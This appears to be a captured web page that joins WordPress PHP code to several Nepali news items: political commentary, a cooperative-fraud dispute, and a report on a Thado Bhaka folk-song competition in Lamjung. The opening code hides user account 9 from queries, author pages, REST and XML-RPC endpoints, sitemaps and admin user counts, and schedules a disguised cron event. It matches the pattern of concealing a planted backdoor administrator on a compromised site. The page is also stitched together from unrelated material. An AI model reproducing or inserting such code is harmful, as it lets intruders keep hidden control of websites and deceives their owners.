add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 9;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 9 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 9;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 9;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 9;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
यो खुशीको अवसरमा त्यो जिम्मेवारी तथा अवसरलाई व्यवहार उपयोगी बनाएर आम नागरिक अर्थात भूइँ मान्छका हितमा काम गर्नु पर्ने र मुलुकमा व्यप्त भ्रष्टाचार, ढिलासुस्ती, घुसखोरी लगायतका सबै सबै प्रकारका विक्रिति विसंगतिको अत्य गर्ने अभिभाराको चुनौति थपिएको छ । यो चुनौतिलाई अवसरमा बदल्न सक्दा मात्र रास्वपाको साख र प्राप्त खुशीले जीवन्तता पाउने छ ।
रास्वपालाई बाह्य क्षेत्रमा भएका विक्रिति विसंगति बडार्नु पर्ने चुनौतिमात्र छैन । पार्टी भित्रै पनि पार्टीलाई के कसरी व्यवस्थित आर्थत अनुशासित, मर्यादित अनि पारदर्शी(हरेक गतिविधिलाई) बनाउँदै पार्टीको संरचनालाई बलियोभन्दा बलियो बनाउने ? अर्को कडा चुनौति पार्टीका सामु खडा भएको छ । पारदर्शीता बिनाको राज्य वा पार्टीको जीवन सहज र सरलपूर्वक प्रवाहित हुन सक्दैन, यो इतिहासले समेत प्रमाणित गरेको तथ्य हो ।
आदर्श छाटेझैं व्यवहारमा उत्रन सजिलो पटक्कै छैन, हुँदैन भन्ने पटक पटक देखिदै र भोगिदै आएको विषय हो । रास्वपाका सभापति रवि लामिछाने, उपाध्यक्ष डिपि अर्याल तथा स्वर्णिम वाग्ले जस्ता उदार मनका धनी सो दलका अन्य व्यक्तिहरू निकै कम देखिने अनि भेटिने गरेका छन् । यतिबेला संकीर्ण सोचका मानिस (सफल होइन्छ जस किन अन्यलाई दिने भन्ने धारणाका व्यक्तिहरू)को घेराबन्दीमा पार्टी जाने छ हैन ? भन्ने आशंका समेत उत्तिकै बढेको छ । अतः रास्वपाको सबै तहको नेतृत्व वर्गलाई मात्तिने काँग्रेस– एमालेको झैं मनपरी गर्ने छुट छैन र गर्नु पनि हुँदैन ।
यदि त्यस्ता संकीर्ण सोच भएका मानिसहरूको हातमा पार्टी नेतृत्व गयो वा त्यस्ताहरूको हालिमुहाली चल्यो भने पार्टी फेरि यतिबेला प्राप्त भए नसोचेको खुशीझैं पार्टी दुर्घटनाको भड्खालोमा जाकिन पनि सक्छ । यो चुनौतिलाई केन्द्रदेखि प्रदेश, जिल्ला, पालिकामात्र नभई वडा तथा टोल, गाउँमा समेत नेतृत्व लिनेहरूले फू फू गरी चल्नु पर्ने देखिएको छ । समयमै यस्तो सदबुद्धि सबैमा आउन जरुरी छ र त्यो आउन सकोस् ।
रास्वपालाई हाल प्राप्त खुशीले जीवन्तता पाइरहन सकोस् भन्ने सुभेच्छा व्यक्त गर्दछौं ।
हिंसा भड्काउने समाचार :
जहाँसम्म ‘हिंसा भड्काउने समाचार लेखेको’ भन्ने जिकिर छ, कालिका साकोसको गतिविधिका बारेमा जान्ने जो कोहीले पनि छातीमा हात राखेर भन्दा हुन्छ कि ठगीको त्यो हरकत गर्नेमा आधा दर्जन हाराहारीका व्यक्तिभन्दा बढी संख्या छैन, तर जो डामिनु नपर्ने हो, डामिन पर्ने वालाहरूले चलखेल गरे, आफ्ना मान्छे प्रयोग गरे, प्रहरीलाई मन्तरे र चलाखीपूर्वक अन्य २६, २७ जनालाई डाम्ने काम गरियो । ती निर्दोष व्यक्तिले त्यो बेलामा सात लाख धरौटी राख्नु पर्ने सिनारियो देखिएको थियो, भलै ऐले त्यो रकम अढाई लाखसम्ममा झरेको छ । यस प्रकार त्यो काण्डमा मुछिएका निर्दोष व्यक्तिहरूले सार्वजनिक स्थलमा बोलेको कुरा हो त्यो । आफ्नो नाम नछाप्ने सर्तमा भनेको त्यो बारेमा समाचारमा लेख्दा आकाश खस्छ ?
माथि भनिसकिएको छ कि मृगेन्द्र दम्पत्ती मेरा काकाभन्दा नजिकका पक्कै हैनन् र मैले काखी च्याप्नै पर्ने कुनै जरुरी छैन । मात्र सत्य के हो भने मृगेन्द्र हालको कालिकाको संस्थापक अध्यक्ष होइनन् र कालिका डुब्नुमा उनी मात्र दोषी पनि छैनन् । एकीकरण पछि उनी जिम्मेवार पदमा पनि रहेनन्÷दिइएन । पछिल्लो चरणमा सहकारी रजिष्टार कार्यालयको आदेशमा डाकिएको विशेष साधारण सभाबाट ३ संस्थाका ३÷३ जना बस्नु भन्ने निर्देशन भएपछि कोषाध्यक्ष बन भनिएकी विनिताले लिखित रुपमा सो पद स्विकार गरेको र उनको नामबाट कतै त्यो सहकारीको बैंक खाता आदि चलेको पाइदैन भने उनी कसरी कोषाध्यक्ष हुन सक्छिन् ? नयाँ कोषाध्यक्षले पद स्विकार नगरेपछि त पुरानैलाई मान्नु अन्यथा हुँदैन र खासमा एकीकरणको बेलाका कोषाध्यक्षबाट त पद अस्विकार गरेको भन्ने सुनिदएको छैन त ! त्यस्तै मृगेन्द्रसँग ४५ लाख धरौटी (पछि सम्पत्ती शुद्धिकरण विभागले थप १५ लाख माग गरेको समेत) माग भएको अन्तरङ्गको गत अंकको पहिलो पृष्ठको शीर्षक मै उल्लेख भएको आम पाठक वर्गले पढ्नु भएकै छ तर मिलन दनाईले ‘मृगेन्द्रको ३० लाख धरौटी बारेमा पनि मौन रहेको’ भन्ने उल्लेख गरेका छन्– त्यस्तो समाचार पीतपत्रकारिता भित्र पर्दैन सायद !
जहाँसम्म श्रीकृष्ण लामिछाने लगायत चारजना उपर खनिएको भन्ने विषय छ, हर्ताहर्तानै उनीहरू हो त्यो साकोसको । अर्को कुरा ‘मुद्दा हालेर देखाए हुन्छ ।’ भन्दै ध्वाँस दिने पनि त उनीहरू नै हो नि ? मिलन दनाईले मुद्दा हाल्दा(कानुनी उपचारमा जादा) हुन्छ भनेर लेखेको फेसबुक म्यासेज हामीसँग सुरक्षित छ । त्यस्तै, प्रहरीले सार्वजनिक सूचना जारी गरेरै पीडितलाई उजुरी दिन आह्वान गरेको तथ्य हुँदाहुँदै ‘पहाडीले घर घर गएर मान्छे उचाल्यो ?’ भन्नुमा पनि तुक देखिदैन । त्यसो हुन्थ्यो भने त उजुरकर्ताहरू पाँच सय हाराहारी हुन्थे, भएनन् त ? अनि घरघर चहार्ने फुर्सद पनि हुनु प¥यो नि ! पहाडीसँग ? सहकारीमा चलखेल गर्ने हर्ताकर्ता भए पछि जस अपजसको भाग त बन्नै प¥यो नि ! समाचारको उद्देश्य त्यत्ती मात्र हो कुनै अन्य आग्रह पूर्वाग्रह नरहेको पुनः प्रष्ट्याउछु । त्यो ठाउँमा अर्को कोही भएको भए पनि समाचार लेखिन्थ्यो । ती चार जना भएका कारणले समाचार लेखेको हैन ।
सो सहकारीका सञ्चालकहरू आजका दिनमा पनि उक्त साकोस चार करोड मुनाफा छ भन्ने भ्रम छर्न उद्दत छन् । त्यो सत्य हो भने शेयरवालहरूको रकम सेयरको साँवा रकम सतप्रतिशत फिर्र्ता गर्न किन आपत्ती ? ‘हामीलाई त्यो रकम दिएर मुक्ति देऊ त्यो नाफा तिमीहरू नै भाञ्सा गर । हामीलाई चाहिएन’ भन्दा पनि सुख नपाइने ? अनि, त्यतिको नाफामा रहेको सत्य भएमा संस्था किन साविक अवस्थाझैं सञ्चालन नगरिएको ?
यसप्रकार उक्त साकोसको वस्तुगत तथ्य र प्रमाण दिएर आफूलाई निर्दोषित प्रमाणित गर्नुको सट्टामा व्यक्तिगत लाञ्छनामा उत्रेदै ‘म निर्दोष छु वा परिवन्दमा परें’ भन्ने कोकोहोलोको अर्थ राख्ने देखिदैन । आफ्नो आङको भैंसी नदेख्ने तर अर्काको आङकको जुम्र्रा खोज्ने प्रवृत्तीले कस्को कति हित गर्ने हो ? भोलिका दिनले बोल्ने नै छन् ।
अन्त्यमा, कृष्ण केसी, मिलन दनाई जस्ता व्यक्तिहरू जो यो समाजमा छन् र त यो पंक्तिकारलाई आजको हैसियतमा पुग्न सहज (उनीहरू भ¥याङको खुड्किला बनिदिएको हुँदा) भएको ठानेको छु । उनीहरूको कलम पनि मेरो झैं चलिरहोस् निरन्तर ! बधाई अनि हार्दिक शुभकामना !
बृद्ध उमेरमा ठाडोभाकाको क्रेज :
सो उपधि हासिल गर्ने पुरुष टिमको नेतृत्व अमरध्वज गुरुङले र महिला टिमको नेतृत्व नेटाकी चिजमाया भण्डारीले गर्नु भएको थियो । उहाँहरू क्रमशः ८२ र ७४ वर्षका हुनुहुन्छ । यसैगरी, सो प्रतियोगितामा सुन्दरबजार नगरपालिका– ११ का नरसुब्बा दुरा र इन्द्रकुमारी दुराको टिमले दोस्रो स्थान हासिल गरेको अयोजक समितिका प्रतियोगिता संयोजक योगेन्द्र गुरुङले बताउनु भयो । उहाँका अनुसार दूधपोखरी गाउँपालिका– ४ का नरबहादुर गुरुङको टिम तेस्रो भयो भने दुरा सेवा समाज सुन्दरबजार इकाईको टिम (सुन्दरबजार नगरपालिका– ६ का आशबहादुर दुरा)ले सान्त्वना स्थान हासिल गरेको छ । संयोजक गुरुङले भन्नुभयो, पहिलो टिमलाई पुरस्कार स्वरुप २५ हजार रुपैयाँ, दोस्रोलाई २० हजार रुपैयाँ, तेस्रो हुने टिमलाई १५ हजार रुपैया र सान्त्वना स्थान हासिल गर्ने टिमलाई १० हजार रुपैयाँ पुरस्कार प्रदान गरिएको थियो । प्रतियोगितामा १२ टिमले भाग लिएका थिए । ठाडोभाकाको प्रतियोगितामा भाग लिनका लागि एक टिममा पहिला र पुरुष गरी ३/३ जना सहभागी (गीत छोप्न) हुनुपर्दछ ।
विजेताहरूलाई समापन कार्यक्रमका प्रमुख अतिथि सुन्दरबजार नगरपालिकाका मेयर कृष्णप्रसाद कोइरालाले पुरस्कार र प्रमाणपत्र वितरण गर्नु भएको थियो । प्रतियोगिताको समापनका अवसरमा उहाँले सो प्रतियोगिताका लागि पुरस्कार प्रायोजनकर्ताहरू र कार्यक्रमका लागि आर्थिक सहयोग गर्नेहरूलाई सम्मान गर्नु भएको थियो ।
पुरस्कारका प्रायोजककर्ता क्रमशः पहिलो पुरस्कारका दिलमाया दुरा हाल : काठमाडौं, दोस्रो पुरस्कारका भिमबहादुर दुरा हाल यु.के., तेस्रो पुरसकारका सोही इकाईका अध्यक्ष गणेशमान दुरा र सान्त्वना पुरस्कारका गजेन्द्र भण्डारी हाल अमेरिका हुनुहुन्थ्यो ।
विजयी कलाकारलाई कार्यक्रमका प्रमुख अतिथि कोइराला, ठाडोभाका लोककला प्रतिष्ठान नेपालका संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा धम्पु, वडाध्यक्ष दीपक ढकाल लगायतले संयुक्त रुपमा पुरस्कार वितरण तथा सम्मान गर्नु भएको थियो ।
दिलमायाको गीतले सहभागीहरू भावविहोल :
सम्मान ग्रहण गरेपछि पहिलो पुरस्कारका दिलमाया दुराले अत्यन्तै भावुुक शैली एवम् कारुणिक शब्दमा आफूलाई आयोजकले सम्झेकोमा अत्यन्तै खुशी व्यक्त गर्दै यस्ता कार्यक्रमहरूमा भोलिका दिनमा पनि सम्झन आग्रह गर्नु भयो । विविध कारणले गाउँमा नबसे पनि गाउँको माया छ र गाउँका लागि केही गर्ने चाहना छ उहाँले भन्नुभयो । उहाँले आफ्ना पति स्व. ललितबहादुरको स्मरण गर्दै उहाँका सम्झनामा पाउँदी दोभानमा घर एक्लै स्वर्गमा जान भएन तिमीलाई डर … भन्ने बोलको गीत गाउनु हुँदा कार्यक्रमका सहभागीहरू भावविहोल भएका गिए ।
अन्य सम्मानित हुनेहरूमा प्राविधिक सहयोग गर्ने ठाडोभाका लोककला प्रतिष्ठान नेपाल र साथमा सो प्रतिष्ठानका अध्यक्ष नवराज पहाडी, निर्णायक द्वय सोही प्रतिष्ठानका संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘घम्पु’ र उपाध्यक्ष सीता दुरा, देउबहादुर दुरादेउबहादुर दुराकी बुहारी चिनमाया दुरा र नाती ध्वाँसे भन्ने यमबहादुर दुरा, लगायत दर्जन बढी व्यक्तिहरू हुनुहुन्थ्यो ।
मेयर कोइरालाले ठाडोभाका साच्चिकै लमजुङको पहिचान बन्न सफल भएको र यस कार्यले गर्वको अनुभूति गराउने गरेको बताउनु भयो । उहाँले ठाडोभाकाको संरक्षण र प्रवर्द्धनका लागि भएका कार्यहरूको सराहना गर्दै अब ठाडोभाका मर्दैन भन्ने सुनिश्चित भएको छ । यसका उपलब्धीले यो कार्यमा लाग्नु हुने प्रतिष्ठानका अध्यक्षसहित सबैको जत्ति प्रशंसा गरेपनि थोरै हुने बताउनु भयो । उहाँले कार्यक्रम स्थल आफ्नो गृहवडासमेत भएको हुँदा यस वडामा ठाडोभाका सहितका विकासका कार्यमा आफू दिलो ज्यान दिएर लाग्ने प्रतिवद्धता व्यक्त गर्नु भयो ।
सम्मानित भएपछि यमबहादुर दुराले करापुटार बजारमा आफ्ना बाजेको निधन पछि पञ्चसुब्बा गुरुङ मनीराम दुराले कहाँ गयो देउबहादुर दुरा शून्य भयो करापुटार बजार … भनेर गीत गाएर आफूले बुढापाकाबाट सुन्दै आएको बताउनु भयो । उहाँले ७४ वर्षीया भवीसरा दुराका साथमा ठाडोभाका गाएर मनोरञ्जन प्रदान गर्नु भएको थियो ।
ठाडोभाका लमजुङको सम्पत्ती :
दुई दिवसीय उक्त प्रतियोगिताको उदघाटन गण्डकी प्रदेश सभाका सदस्य भेषबहादुर पौडेलले हिजो गर्नु भएको हो । उहाँले यो कार्यक्रमलाई विशेष महत्व दिएर आफू पोखरामा भएको कार्यक्रमलाई समेत थाति राखेर यहाँ आएको हुँ भन्ने जानकारी दिनु हुँदै ठाडोभाका लमजुङको सम्पत्ती हो भन्न पाउँदा हामीलाई गर्वको अनुभूति हुन्छ भन्नुभयो ।
उहाँले आफ्नो विद्यार्थीकालको स्मरण गर्दै एमए पढ्दा राजनीति गर्ने व्यक्ति भएर पनि राजनीति शास्त्र छाडेर साहित्य विषय तर अंग्रेजी साहित्य लिएर पढेको बताउनु भयो । उहाँले नेपाली साहित्य पनि अन्य पश्चिमा देशको साहित्यभन्दा कम नभएको तर व्यवस्थित तरिकाले अघि बढाउन मात्र नसकिएको हो भन्नुभयो ।
उहाँले संस्कृतिको महत्व कति छ भन्ने यहाँको यो उपस्थितिले पनि झल्काउँछ भन्नु हुँदै यहाँ राजनीतिक भाषण वा अन्य कुनै कार्यक्रम हुने भनिएको भए यतिका मानिसको उपस्थिति र सहभागिता हुने थिएन भन्नुभयो । यहाँ केही प्रश्न पनि उठेका छन् ती सबैको सम्बोधनका लागि आफूले इमान्दार प्रयास गर्ने प्रतिवद्धता समेत सांसद पौडेलले व्यक्त गर्नु भयो । उहाँले हामी सबैले इमान्दार र अनुशासित भएर काम गर्नु पर्ने बेला आएको उल्लेख गर्नु भयो ।
उक्त कार्यक्रममा ठाडोभाका
लोककला प्रतिष्ठान नेपालका अध्यक्ष नवराज पहाडीले प्रतिष्ठानको स्थापनाकालीन इतिहासदेखि वर्तमानसम्म गरेका मुख्य कार्यक्रम बारे जानकारी दिदै प्रतियोगिता र प्रशिक्षणका माध्यमले आफूहरू योजनावद्ध रुपमा ठाडोभाकाको प्रवर्द्धनका कार्यमा जुटेका छौं भन्नुभयो । उहाँले तर हामीले आजका दिनमा पनि राज्य आफ्नो अभिभावक भएको अनुभूति गर्न नसकेको भन्दै विकास भनेको भौतिक निर्माणमात्र हो भन्ने नेताहरूका सोचमा परिवर्तन हुन आवश्यक छ र लोककला संस्कृति, साहित्यकर्मीहरूले कहिलेसम्म टुहुरो भइरनु पर्ने हो जनप्रतिनिधिबाट जवाफ चाहिन्छ भन्ने माग गर्नुभयो ।
उहाँले उक्त कार्यक्रमका लागि एक लाख प्रदान गर्ने वडा अध्यक्ष दीपक ढकाल र वडा समितिको मुक्तकण्ठले प्रशंसा गर्दै तेस्रो कार्यक्रम जिल्लाका ७५ वटै वडामा हुनु पर्ने र त्यसका लागि यो वडाबाट अन्य वडाले पाठ सिक्नु पर्नेमा जोड दिनुभयो । उहाँले यसरी व्यक्तिका रुचिका भरमा भन्दा पनि तीनै तहका सरकारको कम्तिमा एक प्रतिशत बजेट कला संस्कृति साहित्यका लागि छुट्याउने नीतिगत व्यवस्था हुनुपर्ने आफ्ना माग र धारणा दोहोर्याउनु भयो ।
प्रतिष्ठानका वरिष्ठ उपाध्यक्ष युवराज घिमिरेले उदघाटन सत्रमा प्रतिष्टानको गतिविधि झल्कने कविता वाचन गर्नु भएको थियो । सो अवसरमा नेपाली काँग्रेसका गण्डकी प्रदेशका संगठन विभग प्रमुख हरिप्रसाद बराल, मध्यनेपाल नगरपालिका– १० का अध्यक्ष रामचन्द्र भण्डारी, कार्यक्रम स्थल रहेको सुन्दरबजार नगरपालिका– १० का वडा अध्यक्ष दीपकराज ढकाल, नेपाली काँग्रेसका सुन्दरबजार नगर सभापति प्रकाश सेढाई लगायतले शुभकामना मन्तव्य व्यक्त गर्नु भएको थियो ।
कार्यक्रमका लागि वडाकार्यलयबाट एक लाख सहयोग :
ठाडोभाका लोककला प्रतिष्ठान नेपालको प्राविधिक सहयोग रहेको उक्त प्रतियोगिताका लागि प्रवर्धक रहेको सुन्दरबजार नगरपालिका– १० को वडा कार्यालयले एक लाख रुपैयाँ प्रदान गरेको आयोजकको भनाई छ । प्रतियोगितामा ठाडोभाका लोककला प्रतिष्ठान नेपालका संरक्षक एवम् ठाडोभाका महानायक बुद्धिमान दुरा ‘धम्पु’ निर्णायक समितिको संयोजक र प्रतिष्ठानका उपाध्यक्ष एवम् ठाडोभाका गायिका सीता दुरा सदस्य रहनु भएको थियो ।
कार्यक्रमको उदघाटन सत्रमा प्रतिष्ठानका वरिष्ठ उपाध्यक्ष युवराज घिमिरेले प्रतिष्ठानको गतिविधि सहितका चिनारी सहित रचना गर्नु भएको कविता वाचन गर्नु भएर सहभागीहरूलाई कार्यक्रममा फरक स्वाद पस्कने काम गर्नु भएको थियो ।

अयोजक संस्था दुरा सेवा समाज धुसेनी इकाईका अध्यक्ष गणेशमान दुराको अध्यक्षतामा भएको उक्त कार्यक्रममा कार्यक्रम संयोजक योगेन्द्र गुरुङले स्वागत गर्दै कार्यक्रमको उद्देश्यमा प्रकाश पार्नु भएको थियो । उहाँले सो कार्यक्रमका लागि सुन्दरबजार नगरपालिका– १० को वडा कार्यालयले एक लाख रुपैया प्रायोजन गरेको जानकारी दिनुभयो ।